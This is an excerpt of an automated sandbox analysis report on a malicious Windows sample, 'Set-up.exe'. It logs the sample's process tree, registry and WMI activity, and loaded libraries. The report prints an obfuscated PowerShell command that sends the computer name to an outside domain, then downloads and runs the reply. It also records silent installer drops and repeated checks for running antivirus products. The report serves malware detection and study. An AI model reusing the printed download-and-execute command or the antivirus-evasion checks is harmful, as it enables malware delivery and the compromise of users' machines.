              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Set-up.exe, 00000000.00000003.1820887982.00000000034C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Set-up.exeReversingLabs: Detection: 18%
              Source: Set-up.exeVirustotal: Detection: 17%
              Source: Set-up.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Set-up.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Set-up.exeString found in binary or memory: /LoadInf=
              Source: Set-up.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (aJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: appresolver.dllJump to behavior
